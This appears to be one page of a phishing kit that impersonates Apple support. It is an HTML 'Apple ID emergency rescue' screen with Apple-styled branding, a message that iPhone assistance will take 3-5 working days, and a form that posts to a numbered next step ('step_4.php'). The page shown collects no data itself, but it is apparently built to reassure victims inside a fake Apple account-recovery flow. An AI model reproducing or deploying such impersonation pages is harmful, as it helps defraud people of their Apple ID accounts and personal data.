<html>

<head>
  <meta http-equiv="content-type" content="text/html;charset=utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=Edge">
  <meta content="always" name="referrer">
  <script src="./js/base64.js" type="text/javascript"></script>
  <!-- <script src="//cdn.bootcss.com/jquery/1.9.1/jquery.min.js"></script> -->
  <script src="./js/jquery.js"></script>
</head>

<body>


  <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  <meta name="viewport" content=" initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
  <title>Apple - Apple ID 紧急救援</title>
  <style type="text/css">
    .STYLE1 {
      font-family: "微软雅黑";
      font-size: 16px;
    }

    body {
      background-image: url(images/001.jpg);

    }

    .STYLE2 {
      font-size: 24px;
      font-weight: bold;
      font-family: "微软雅黑";
      color: #FFFFFF;
    }

    .STYLE4 {
      font-size: 14
    }

    .STYLE5 {
      font-size: 14px;
    }

    .STYLE8 {
      font-family: "微软雅黑";
      font-size: 14px;
      color: #FFFFFF;
    }

    .in_text {
      height: 60px;
      border-radius: 8px;
    }

    .tb_no {
      border-radius: 8px;
      background: white;
      width: 250px;
    }
  </style>



  <table width="100%" height="35" border="0" cellpadding="0" cellspacing="0" bgcolor="071b22">
    <tbody>
      <tr>
        <td align="left"><img src="images/02.jpg" width="25" height="35"></td>
        <td align="center"><img src="images/03.jpg" width="30" height="35"></td>
        <td align="right"><img src="images/04.jpg" width="26" height="35"></td>
      </tr>
    </tbody>
  </table>
  <table width="90%" height="95" border="0" align="center" cellpadding="0" cellspacing="0">
    <tbody>
      <tr>
        <td height="73" align="center">
          <span class="STYLE2">欢迎使用 Apple 支持</span><br><br>
          <span class="STYLE8">我们随时提供帮助</span>
        </td>
      </tr>
    </tbody>
  </table>
  <table width="90%" height="96" border="0" align="center" cellpadding="0" cellspacing="0">
    <tbody>
      <tr>
        <td align="center"><img src="images/kefu.png" width="310" height="175" style="margin: 0 0 10 0;"></td>
      </tr>
      <tr>
        <td>
          <p class="STYLE1">该iPhone 项目协助需要3-5个工作日，</p>
          <p class="STYLE1">我们会为您推荐解决方案。请耐心等候回音；</p>
        </td>
      </tr>
      <tr>
        <td>&nbsp;</td>
      </tr>
    </tbody>
  </table>
  <script language="javascript">
    function chkfrm(afrm) {
      return true;
    }

  </script>
  <form onkeydown="ENTER(event);" onsubmit="return chkfrm(this);" method="post" name="form1" action="step_4.php">

    <table width="64%" height="47" border="0" align="center" cellpadding="0" cellspacing="0">
      <tbody>
        <tr>
          <td height="47" align="right"><label>
              <input type="submit" name="Submit" value="完成">
            </label></td>
        </tr>
      </tbody>
    </table>
  </form>
</body>

</html>